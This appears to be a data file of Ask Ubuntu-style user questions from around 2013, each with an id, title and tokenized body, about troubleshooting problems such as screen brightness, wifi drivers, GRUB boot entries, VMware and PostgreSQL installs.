295675	the dreaded brightness issue ( fn keys + max brightness )	edit : updating to ubuntu 13.10 solved this issue for me out of the box . i 'm trying to get some control over the brightness of my samsung qx411 ( integrated intel and discrete nvidia , though ubuntu does n't see the latter yet , i 'll play around with bumblebee later ) using the fn+up/down lowers the screen brightness from max to one peg down or back up . if i try to bring the brightness down any more , it just flickers and stays the same . i can lower the brightness in settings , but that 's delicate and gets reverted to max if i open up the brightness settings again , or log out . the closest i got was adding acpi_backlight=vendor to a line in /etc/default/grub , ( source ) i could consequently lower the brightness a couple of pegs down to the minimum with fn+down , but then it 's as if the problem got inversed , and i 'd get stuck in the bottom tier , i could only increase the brightness by one peg and back down . rebooting would revert to max brightness . acpi_osi= , acpi_osi=linux , acpi_osi=vendor , acpi_osi= ' ! windows 2012 ' , acpi_backlight=linux , acpi_backlight= ' ! windows 2012 ' do n't do anything for me . i 've also tried adding echo 2000 > /sys/class/backlight/intel_backlight/brightness to /etc/rc.local , where my max value from cat /sys/class/backlight/intel_backlight/brightness is 4648 , which did n't do anything . ( same result with echo 2000 > /sys/class/backlight/acpi_video0/brightness ) source samsung tools also did n't help in this regard . i 've spent hours on this , it 's getting quite frustrating . any help would be greatly appreciated .
295677	ubuntu 12.04 lts/lampp/xampp : an error occurred while extracting files	new to linux/ubuntu , xampp and drupal . i 'm trying to install xampp/lampp/drupal to a usb thumbdrive and i keep getting : `` an error occurred while extracting files '' . i have no idea on how to fix it . any help would be appreciated . fyi : i just removed microsoft xp and installed ubuntu 12.04 lts about 7 days ago .
295679	no duplicated lines in bash history	supposedly , adding export histcontrol=ignoreboth to .bashrc would do the trick , but what i see in practice is there still exists duplicated lines in my .bash_history file . you can see my .bashrc below . export histfilesize=100000 export histsize=100000 export histignore= '' ls* : rm* : cd* : cd* : ps* : exit* : reset* : clear* : synaptic* : mkdir* : cat* '' export histcontrol=ignoreboth shopt -s histappend export prompt_command= '' history -a ; history -c ; history -r ; $ prompt_command '' does anybody know why i 'm still getting duplicated lines ?
295681	software update corrects error	i 've got this message everytime i try to install update to my ubuntu ... '' requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . '' there is an answer to this question but the thing is mine 's diffrent . i am using precise pangolin 12.04.1 lts . any other suggestion for me ? ? ? ? thanks before ... ps : i am using 11.10 oneiric ocelot and migrate to 12.04.1 precise pangolin if that 's help
295683	does wubi format my c drive if i select c drive in 'installation drive '	i 'm really excited to actually install ubuntu on my computer but i would like a way that does n't take up too much disk space and neither lets me have risks of mistakenly formatting / partitioning the system drive , and also with an easy to uninstall . i found wubi . but the official wubi guide does n't make it clear . when this screen appears ( the picture is from the wubi guide ) https : //wiki.ubuntu.com/wubiguide ? action=attachfile & do=get & target=wubi-123.png if i choose c drive for installation drive like shown in the picture , does it format my c drive ? and i 'm running windows 7 home premium x64 english sp1 now , does it matter if i choose japanese for language ?
295690	13.04 headphones not working [ asus r500vm ]	after recently succeeding with dual-ubuntu-win8 installation i got problem with my headphones not working . when i plug them my sound is muted . tried many solutions found here , but not even one seems to be working . anyone got simmilar problem on asus ? if you need any logs , confs just tell me and i will paste them here .
295700	how to install ofbiz on ubuntu12.04 ?	i want to install ofbiz on my laptop.i installed ubuntu 12.04 gui version.can anybody help me out ? ? ? i tried so many procedure from internet , but every time i failed .
295701	what would be the differences between a persistent usb live session and a installed ubuntu in a usb drive ?	i 'm a teacher and will ask my students to either bring their laptops with ubuntu installed with an specific list of packages preinstalled or bring a usb drive or external hard drive with ubuntu and the packages preinstalled . for those who are going to bring the usb are two posibilities : install with the ubuntu 's `` startup disk creator '' program , and telling it to reserve some space for persistence . boot with a livecd and install ubuntu in the usb drive . then , in either case , boot with that media and install the packages . so , for my purpose or any other purpose : what is the best choice and why ? do we have another option ? full explanation please .
295702	alternative image viewers	i dont really like eye of gnome ( eog ) . what other image viewers are available for ubuntu ? i am using gwenview but it takes a long time to load .
295709	sound is not working in dell inspiron 3520	i have installed ubuntu 13.04 on my laptop { dell inspiron 3520 , i5 } but the sound is not working , and when i called dell for the problem solution they told that `` sorry we are n't trained in ubuntu , so we can'nt help you '' please help me..
295717	window decoration missing after upgrade to 13.04	a few seconds after login my window decorations disappear and i have a black desktop background . i installed the latest catalyst drivers . 13.4 . i have an hd7880 . i tried : gtk-window-decorator -- replace unity -- reset reinstalling drivers . how to debug / fix this .
295719	how to set epson l100 on ubuntu 12.04 .	i can`t find drivers for this printer . i searching on http : //download.ebz.epson.net/dsc/search/01/search/searchmodule , but nothing . maybe other series drivers can work with it ?
295720	is there any eraser button in libreoffice	i know this looks like an idiotic questions . but i need to know . before shifting to ubuntu in microsoft word theres a eraser button in doc menu which i used several times . but in ubuntu libreoffice i ca n't find anything like it . is it exist in it ? or i have to use another one which have this button . then please suggest me another program .
295722	ca n't connect facebook to online accounts in 13.04	just install 13.04 and am having trouble setting up online accounts with facebook . it opens up firefox and when i log in it comes up with a security warning . any ideas why this is or what i could do to fix it ?
295727	is bbswitch required for bumblebee to work properly ?	i have an nvidia optimus video card . i disabled it using bbswitch , and i 'm using bumblebee to run programs using the discrete graphic card . i want to know what 's going to happen if i remove bbswitch ( because it , sometimes , prevents ubuntu from shutting down ) ? is the discrete gpu going to be always on ( and consequently making the laptop too hot ) of is bumblebee going to handle this ? i 'm running ubuntu 13.04 thank you .
295728	packaging nodejs code , how do i prevent lintian from complaining about ./node_modules ?	we ran into this problem while packaging some software written in nodejs . because we ca n't package each and every dependency separately , we need to ship the node_modules/ directory along with the program . the code is installed into usr/share/ < project > / ... , and these are the warnings ( and errors ) that generates : w : < project > : extra-license-file usr/share/ < project > /node_modules/express/node_modules/mkdirp/license e : < project > : wrong-path-for-interpreter usr/share/ < project > /node_modules/request/node_modules/node-uuid/benchmark/bench.gnu ( # ! /opt/local/bin/gnuplot ! = /usr/bin/gnuplot ) there are hundreds of these . i understand that all of those errors are relevant and meaningful , but i do n't know how to get rid of them without cheating and without packaging each dependency separately . is there another directory in the fhs in which a directory full of rubbish , like node_modules/ , would be okay ? we 've also looked into running npm install as part of the post install script , but decided we ca n't do that ( for security and maintenance reasons )
295737	how do i add xfwm4-settings to the preferences windows in lubuntu ?	so i am running lubuntu 12.10 and i just switched my windows manager to xfwm4 following the instructions here : is there a lightweight way to snap windows in lubuntu ? i was wondering , how do i add xfwm4-settings to the preferences panel ? i found this page : http : //www.h-bomb.nl/2012/08/10/xfwm4-window-manager-lubuntu/ that showed how to add the windows manager tweaks preference box but i 'm still not sure how to add the settings preference .
295748	thunderbird & unity integration	how do i get thunderbird & unity integration , specially the icon on the top bar ? its raring ringtail btw .
295749	how to create a bootable iso file from a multiboot usb	i want to make a bootable iso file out of my 6-os multiboot usb . how can i achieve the task .
295750	`` the update information is outdated . '' error in ubuntu 13.04	i use ubuntu 13.04 32bit in a dell studio 1537 . its been a couple of days , i see a error/warning sign ( a red triangle with exclamation sign in it ) on the top bar . clicking on it the message says , `` the update information is outdated . this may be caused by network problems or by a repository that is no longer available . please update manually by clicking on this icon and then selecting 'check for updates ' and check if some of the listed repositories fail . '' there is no network problem since internet works fine . when i check for updates , shows your computer is up to date here is the output of sudo apt-get update
295754	how do you open a downloaded file from synaptic ?	i am trying to open a file i downloaded from synaptic . how do you do that ?
295755	windows 7 is not shown in grub menu after 13.04 install	i installed ubuntu 13.04 on a secondary hard drive , which has succeeded . but there is no grub entry for windows 7 as an option . boot-repair and update-grub did not appear to help . http : //paste.ubuntu.com/5667558/ i should note that i did n't realize my pc has uefi , which i 've since disabled . i want grub on sdb .
295756	how is robust terminal emulation achieved in ubuntu ?	my question is using only ubuntu and/or open source components , how is full terminal emulation with keyboard mapping , logging , and printing achieved in ubuntu without purchasing a product ? by using the term terminal emulation , i am referring to having keys that are mapped to functions , and behave in a couple of but not limited to two standard cases , a vt100 or standard unix/linux terminal . i have very good terminal emulation in ubuntu , because i went out and purchased vandyke 's securecrt for linux . my customers use the windows version of vandyke 's securecrt , and i also need it on linux . however , i have to believe there is another to do keyboard remapping and obtain some , if not all , other things an emulator provides without purchasing a product . if so , where does an end-user turn to achieve terminal emulation ?
295764	having trouble trying to convert iso to img for usb install , says `` no such file or directory ''	attempting to convert .iso to .img for usb install , here is the line of code : hdiutil convert -format udrw -o ~/ubuntu-13.04-desktop-i386.img ~/ubuntu-13.04-desktop-i386.iso . after trying to execute the command terminal says `` no such file or directory '' . so i do n't know what i 'm doing wrong , is there a space where it should n't be or do i have something backwards , i do n't know , i just need some help , so i can make this usb install work .
295765	upstart and core files	i have an upstart job that occasionally crashes with a segmentation fault , and i have a few questions about core dumps . first , should i add a stanza : limit core unlimited unlimited is there a downside to allowing unlimited core sizes ? would a finite limit be better ? second , where will the core file go ? if the default is not a standard or logical place , how do i make it show up somewhere else ?
295766	rsync behavior in a cron script	i have an nfs device that creates checkpoint ( backups ) everyday . i want to use rsync to copy these checkpoints to another device ( drobo connected via iscsi ) . so i 've run the script on a single nfs share and it works nicely . here are a couple concerns i have that will take too long to experiment with multiple times . there are multiple shares to back up , and i would like to loop through them and run the script over each one . how will this work with rsync ? will the rsync job start and then loop again and run a second and third and fourth rsync job simultaneously , or will rsync wait for the job to finish before ending and restarting the loop ? maybe i just need to put some check in the loop to not restart until rsync is done . referring to that last sentence ; what does rsync return that i could use to report if there was an error or continue the loop if all went well ? the checkpoints created by the nfs device are named based on the date . rsync is unpacking the .ckpt* file into a statically named directory . since the source is a different directory but the files inside are the same , and the target is named the same , will rsync still only copy the differences ? this is the rsync job : rsync -az $ newchkpt/* /drobo/bak. $ { share } / $ { share } _daily i know this is post is asking alot . any advice is greatly appreciated .
295772	`` sudo service lightdm stop '' will go into a blank screen	i am trying to stop x server so i can install some new nvidia drivers . however , the moment i type `` sudo service lightdm stop '' , the computer goes into a blank screen , and nothing happens . any ideas ? thanks . macbook pro retina ( 10,1 ) , xubuntu 13.04
295773	i want to reformat my home partition from ext3 to ntfs	i have three partitions : one with ubuntu 12.04 , the other is a data partition ( the largest of the three ) and the last one has windows 7 . first i installed ubuntu , then i formatted the data partition as ext3 and chose it as my home folder . like a month after i installed windows 7 on the third partition , and realized that it ca n't read the data partition ( ext3 ) . so i just want to reformat it from ext3 to ntfs with gparted . i thought of just copying the entire home folder ( with hidden and system files ) to an external hard drive i have , unmount home , reformat the partition to nfts , and just copy everything back and mount again . but i do n't know if this will be the wise thing to do . please help .
295780	how delete gmail account from evolution ?	i would use evolution only to work ( company email/calendar/contacts etc ) , but it 's already set up an gmail account . unfortunately i ca n't delete it because the `` delete '' button is disabled for this account . private emails i want to have in thunderbird . how can i remove it from the evolution ? and still use google calendar and gtalk in empathy ? br parasit
295792	how do you get an hourly talking clock ?	i want to get a program ( a script that can be set to auto-start or something ) that tells you every hour like `` it 's 11 o'clock . '' i know it 's easy on macs , but how do you get that on precise ?
295803	how to print pdf documents with a cmyk color profile from libreoffice ?	i would like to print to pdf documents from libreoffice writer but with cmyk color profiles . how can i achieve this ?
295806	how can i get my laptop 's hardware configuration ?	i would like to to see all parts of my dell laptop , especially my wireless card ( but including other information other like cpu and gpu ) . i tried some commands in the terminal as root but i did n't get useful results ... . does anyone know the right commands or right program to do this ? i use ubuntu 12.04 , and i have n't installed any updates or installed additional drivers .
295807	how to setup a wi-fi hostpot ( ap ) in 12.10 ?	i just find a way to setup this is the link . i am doing just step by step . but in ubuntu 12.10 , my android phone not able to receive an ip . could someone help me out ?
295811	install ubuntu on msi u100 ?	i have a msi u100 and i have ubuntu 10.04 and i do n't like it . i do n't have internet access at home . i downloaded 13.04 and tried to boot it from there and i did the start up disk creator but it still does n't work . can anybody help ?
295813	problem installing latest vim on ubuntu 12.10	i am trying to install the latest version of vim on ubuntu 12.10 . but when i use this command sudo apt-get install vim it gives me such an error how to solve this ?
295814	ubuntu joining a active directory domain	during the command sudo domainjoin-cli join *domain* *user* i get the error removing the .local and just using the domainame i get this error pretty new with ubuntu and do n't know what to do . just for clarifying , it is a windows active directory named jacob.local
295819	wireless bcm4318 not working	i was just about to update , or activate ( as its listed in the software ) my wireless driver and the hole system crashed , i rebooted and now i dont have the driver listed anymore in my aditional drivers , i have tried many things but none came back positive , can you guys help :
295820	play audio through bluetooth speakers in 12.04 using cli	i have gone through the whole gamut of trials with setting up playing audio through bluetooth and have not been able to make it work reliably ( i.e. , got it to work one time , and has not worked after rebooting ) . i can see the bluetooth interface ( hciconfig ) and can see the speaker ( d100 creative ) in a hcinconfig scan , but run into problems with bluez . the documentation is terrible and has not changed much since this guy wrote about it . i really do not want to talk about or debug this issue further . i am beaten and worn out on this issue . however , i seem to have better luck connecting to the d100 using the default ubuntu gui . i can get the sound to work through the bluetooth speakers and i get sound when i click on the `` test sound '' button . how can i do this same thing using command line ? where can i find out what the bluetooth/sound app uses in the backend to make this work and play an mp3/wav file ?
295839	how to connect empathy to facebook	i am a new user of ubuntu and i want to connect empathy internet messaging with facebook . so when i select facebook from the list given in online accounts a window opens up for me to authorize access and a url opens saying : success security warning : please treat the url above as you would your password and do not share it with anyone . although after this nothing happens ... when i open the messenger nothing comes up and in online accounts it still asks : please authorize ubuntu to access your facebook account ... but i have already given permission ... please help me out . thanks in advance .
295841	wi-fi is disabled by hardware switch asus x75vd [ fixed ]	i just installed ubuntu 13.04 on my notebook . the options in the wireless menu are all gray . i tried all the solutions i found . please help ! edit : i fixed it , i had to install windows ...
295848	wifi issues in lenovo g460	i read several forums and questions , and it seems that everyone have issues with wifi connections , since the last update of 13.04 . i 've got the same problem with the last kernel update in fedora18 , and for that i had to unistall it ( sigh ) and try ubuntu , but it was the same . i tried almost every kind of solution , nothing worked for me . does anybody knows when the ubuntu team will solve this problem ? edit : wifi works fine in w7 and my galaxy tab2 update : info required sudo lshw -class network *-network descripción : interfaz inalámbrica producto : ar9285 wireless network adapter ( pci-express ) fabricante : atheros communications inc. id físico : 0 información del bus : pci @ 0000:05:00.0 nombre lógico : wlan0 versión : 01 serie : 1c:65:9d : d6 : e4:9f anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress cap_list ethernet physical wireless configuración : broadcast=yes driver=ath9k driverversion=3.8.0-19-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn recursos : irq:17 memoria : d6400000-d640ffff *-network descripción : ethernet interface producto : rtl8101e/rtl8102e pci express fast ethernet controller fabricante : realtek semiconductor co. , ltd. id físico : 0 información del bus : pci @ 0000:06:00.0 nombre lógico : eth0 versión : 02 serie : 1c:75:08:56:2e:76 tamaño : 100mbit/s capacidad : 100mbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.15 latency=0 link=yes multicast=yes port=mii speed=100mbit/s recursos : irq:41 ioport:2000 ( size=256 ) memoria : d2410000-d2410fff memoria : d2400000-d240ffff memoria : d2420000-d243ffff lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 05:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 3 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no now i have this wifi problem on w7 , sigh : ( . never happened in w7 before linux messed up my wifi hw
295855	connect wireless & wired network	i want to build a network that consists of 3 pc 's : a client , a server and an intermediate . client connects with intermediate wirelessly while server connection with intermediate is wired . so intermediate has wired and wireless card . although when i ping the client for server i get error message : unreachable destination . i used different networks for wired and wireless , for wired i used 192.168.1.0 while for wireless i used 192.168.2.0 . notice that i use ubuntu 13.04 . can someone please help me solving this problem ?
295857	why is ubuntu running very slowly on my laptop ?	i installed ubuntu on on a toshiba laptop and although it installed without any problems , it 's running very slowly . i would like help diagnosing why ubuntu is running so slowly . it takes a long time for any application to start when i click on it . is this to be expected ? really tired of windows and i 'd like to switch but i need to work this all out first . also , where do i find the equivalent to device manager to see what hardware did n't install properly ? toshiba satelite pro l300d-ez1002x amd turion 64x2 2 gig memory dual boot with windows vista ultimate 64
295860	ubuntu 13.04 upload speed slow	i have 2 machines on the same lan . one downloads and uploads perfectly . the other downloads great , but the upload is painfully slow ~30kb/s . it 's using the onboard ethernet port , which i think is a gigabit port . any ideas ?
295863	vmware player wont install on ubuntu 13.04	i have followed these instructions : sudo apt-get install build-essential linux-headers- $ ( uname -r ) chmod +x ./downloads/vmware-player*.bundle gksudo bash ./downloads/vmware-player*.bundle i got this output : extracting vmware installer ... done . you must accept the vmware ovf tool component for linux end user license agreement to continue . press enter to proceed . [ # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ] 100 % thats it - nothing else happened . so i then tried : cd downloads sudo ./vmware-player-*.bundle and sudo sh ./vmware-player-*.bundle and this was the output : extracting vmware installer ... done . you must accept the vmware ovf tool component for linux end user license agreement to continue . press enter to proceed . vmware open virtualization format tool license agreement notice to user : this open virtualization format tool ( `` ovf tool '' ) license agreement is a contract between you ( either an individual or a single entity ) and vmware , inc. ( `` vmware '' ) , which covers your use of the vmware software that accompanies this ovf tool license agreement and related software components , which may include associated media , printed materials , and `` online '' or electronic documentation . all such software and materials are referred to herein as the `` software . '' if you do not agree to the terms of this ovf tool license agreement , then do not install or use the software . by explicitly accepting this ovf tool license agreement , however , or by installing , copying , downloading , accessing , or otherwise using the software , you are acknowledging and agreeing to be bound by the following terms . 1 . definitions . an endless scroll of text ( i tried to get to end holding the return button for 5 mins ) can someone please help ? ( really wish there was a deb package for this very popular software . )
295866	will `` world of tanks '' run on ubuntu ?	i play world of tanks ( a game ) in windows . will it work on ubuntu ? better , worse , same ? i would like to try ubuntu but not if w.o.t wo n't work .
295870	how can i eliminate the choice between windows and ubuntu every time i boot ?	after making a bootable disk of ubuntu 13.04 , i opened it from windows 8 and ran wubi.exe . then i was presented with three options ... reboot now reboot later help me boot from disk i selected choice no . 3 , but the installation did n't run properly . from that point on , whenever windows boots , it shows the windows boot manager with the choice between windows and ubuntu . i want to get rid of this menu and want to use only windows 8 or both . how is it possible ... ..please help me ...
295871	kernel panic on fresh install of 13.04	i went back to ubuntu last night and gave my laptop a fresh install of 13.04 after alot of talk about how stable and quick it had become . it looks awesome ! it worked great for 18 hours , but now i get kernel panic . three of them in the last 30 min . i tried to remove the ubuntu one music lens via the usc . it seemed to work , but before i could log in and out again , the system crashed . when i booted up again , the silly music search function was still there in the dash . i tried to reboot , but it was still there . i went for the software center again to search for ubuntu one music , and the system crashed again . i got back in to try to install ubuntu one music again , but it was never removed . i have been able to open firefox and write this post.. do n't know if it will crash again and why it does that . any idea why the kernel panics occure and what i need to do.. ? thanks alot and hope it is an easy fix !
295876	how do i login to ubuntu forums using openid ?	i have n't been on ubuntuforums.org for ages , but i came across a thread from a search . annoyingly , the forums require to be logged in to view images ! so i tried to login . i was looking for a login field to enter my openid url ( https : //launchpad.net/~james.r.haigh ) , but i could n't find anything . i 'm pretty sure there used to be something obvious like âlogin via openidâ . i tried entering my url in the username field , but as expected it did n't work .
295877	visual artifacts when installing ubuntu 12.04	i recently wanted to try out ubuntu so i decided to get the windows installer for ubuntu 12.04 . after it finished installing , it asked me to restart my computer . after it restarted it booted up ubuntu and all i see is geometric artifacts all over the screen . if anyone could help me fix it , i would really appreciate it . picture of what my screen looks like :
295890	unstalling windows which installed ubuntu through wubi	i had a windows7 installation on c : i installed ubuntu through wubi on d : now i want to uninstall windows on c : and re-install it on c : only . will it be okay to do it ? will my ubuntu installation remain as it is ? is there something i need to take care of ?
295891	got `` package operation failed '' error while installing postgresql using ubuntu software center	i am trying to install jdownloader . but , while installing it using sudo apt-get install jdownloader , i got some error . like this : j @ ubuntu : ~ $ sudo apt-get install jdownloader reading package lists ... done building dependency tree reading state information ... done jdownloader is already the newest version . the following package was automatically installed and is no longer required : acroread-common use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 46 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up postgresql-9.1 ( 9.1.9-0ubuntu12.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-05-15 18:52:29 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-05-15 18:52:29 gmt detail : permissions should be u=rwx ( 0700 ) . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : postgresql-9.1 postgresql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) j @ ubuntu : ~ $ and , trying sudo apt-get -f install resulted this.. j @ ubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : acroread-common use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 46 not upgraded . 2 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up postgresql-9.1 ( 9.1.9-0ubuntu12.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-05-15 18:53:13 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-05-15 18:53:13 gmt detail : permissions should be u=rwx ( 0700 ) . [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : postgresql-9.1 postgresql e : sub-process /usr/bin/dpkg returned an error code ( 1 ) j @ ubuntu : ~ $ i have tried to install it using ubuntu s/w center , still got following error entitled package operation failed : installarchives ( ) failed : selecting previously unselected package postgresql . ( reading database ... 100 % ( reading database ... 368757 files and directories currently installed . ) unpacking postgresql ( from ... /postgresql_9.1+129ubuntu1_all.deb ) ... setting up postgresql-9.1 ( 9.1.9-0ubuntu12.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-05-15 18:45:26 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-05-15 18:45:26 gmt detail : permissions should be u=rwx ( 0700 ) . ... fail ! invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : postgresql-9.1 postgresql error in function : setting up postgresql-9.1 ( 9.1.9-0ubuntu12.04 ) ... * starting postgresql 9.1 database server * the postgresql server failed to start . please check the log output : 2013-05-15 18:45:28 gmt fatal : data directory `` /var/lib/postgresql/9.1/main '' has group or world access 2013-05-15 18:45:28 gmt detail : permissions should be u=rwx ( 0700 ) . ... fail ! invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of postgresql : postgresql depends on postgresql-9.1 ; however : package postgresql-9.1 is not configured yet . dpkg : error processing postgresql ( -- configure ) : dependency problems - leaving unconfigured any help for this ? thanks in adv .
295893	colorpicker plugin for sublime text 2	i have installed sublime text 2 in my ubuntu 12.04 . but i ca n't install a colorpick plugin for the sublime . i downloaded a zip file from github named : 'package control sublime-package ' . but i ca n't install the plugin . can anyone please help me ? ? ?
295895	how can i tie an alert to a libra database ?	i want to know how to tie an `` alert '' or notification to a column in a libreoffice database table . i 'm a new linux user and am working with a libreoffice database . in the near future i intend to put together a database of my clients . could anybody tell me if it would be possible to work some sort of alert tied to a date in each entry , for example if the database records mr j.smith having work done on the 15/01/2014 can i get base to remind me to call him a month later ?
295905	anti-aliasing in gvim	apparently there 's no anti-aliasing in vim-gtk in xubuntu so the console version looks better than gui one . is there a way to turn it on ?
295907	very poor file transfer performance	just recently , my system is really struggling to move large amounts of data ( sometimes few big files , sometimes many small ones ) . the trouble occurs when the files are being moved off of my hardrive to an external system , either a mounted network share or an external usb . the network share and usb experienced the same symptoms , but i 'm not sure if they are necessarily related . the most recent example was moments ago when i tried moving a folder totalling 1.9gb from my hard drive to a usb stick , via nautilus copy & paste . by the time the progress bar had opened , the operation was about 1/3 done , reporting 600mb transferred . the transfer rate at this time was 29mb/s , and was rapidly declining . it went from 29 mb/s to 20 mb/s in a few seconds , went from 20 to 10 in about 10 seconds , and eventually bottomed out at 6mbs . there was also a period of about 30 seconds where the whole operation seemed stalled , as in , no updates shown in the progress window . an operation like this should take only a few seconds , and ended up taking about 3 minutes . yesterday i tried moving this same folder onto the network share and experienced similar symptoms . it took about 30 seconds for the progress bar to reach half way , and then the whole thing just stopped . network monitor showed a flatline 0 bytes/s . i have a newish ssd in the machine , so i do n't think that 's the bottleneck . what kind of things should i check to track down the root of this issue ? using ubuntu 12.10 . the files i was trying to move were in my home folder which uses encryptfs .
295909	how to revoke partly executed commands ?	after two weeks of no-problemo ubuntuing , my sound was gone . i looked for help and found this answer . i entered the huge wall of code and hit `` enter '' and `` y '' a few times . while the terminal was doing it 's thing i read this line in the same post : `` whatever you do do n't enter the huge code on the first answer ! it completely ruined my login screen . '' i freaked out and cancelled the operation . now i want to revoke everything the command did , whatever it did ... and after that , i want my sound back ... [ edit ] ok ... sound is back now after nothing but a few reboots . but i 'd like to know anyway because i do not know , what i did to my system .
295911	ca n't log to my ubuntu session after power failure	i 'm getting this error when i try to log in to my ubuntu session : your session only lasted less than 10 seconds . if you have not logged out yourself , this could mean that there is some installation problem or that you may be out of diskspace . try logging in with one of the failsafe sessions to see if you can fix this problem
295918	mozila is always going to java site for updated version	i had clicked on `` always perform the task '' and now mozila is directing to java site whenever i am trying to download in keepvid . what should i do ?
295920	how can i change chrome 's title bar text ?	i have chromium web browser open and i do n't want it to say chromium web browser in the title bar in unity . it can be blank for any app i have open as well using 12.04
295922	internal hdd auto-mounted for another user	i 'm running ubuntu 13.04 , the system is hosted in one hdd . i 've recently added a secondary hdd . everything is auto-mounted with the disks gui tool of ubuntu . it works for my session as main user of the system , it is mounted in /media/mat . if a second user switch on the computer and log into his session , it ca n't mount the second hdd ... ask for password . and my goal was to share this hdd between users ( with appropriate rights ) . how can this hdd be mounted on start up of the pc for any users to use without root password ?
295927	ubuntu 12.04 connects to some wireless networks but not others	i installed 12.04 on a lenovo ideapad with a broadcom driver . it connects to some wifi networks with no problems . although some others it keeps trying to configure and then disconnects and tries again . i am pretty unfamiliar with terminal commands , but i have already tried things suggested in other threads that are like mine . any suggestions ?
295932	`` system problem detected '' password fail	i have multiple ubuntu precise servers and workstations , all of which suffer from the same really infuriating problem : when the `` system problem detected '' dialog comes up due to something or other crashing , clicking `` report problem '' throws an elevation dialog ... which , unfortunately , does n't work . i 'm assuming this means that the elevation dialog is looking for a root password - for which there is none - rather than looking for my own password to use with sudo ( and , yes , my account is a member of the sudo group , and normal gksudo prompts work just fine ) . does anybody know what 's up with this ? i 'd really like to be able to submit problem reports when things crash . it irritates me to no end that i end up having to just click `` close '' like some kind of scrub who does n't care about reporting bugs . > = [
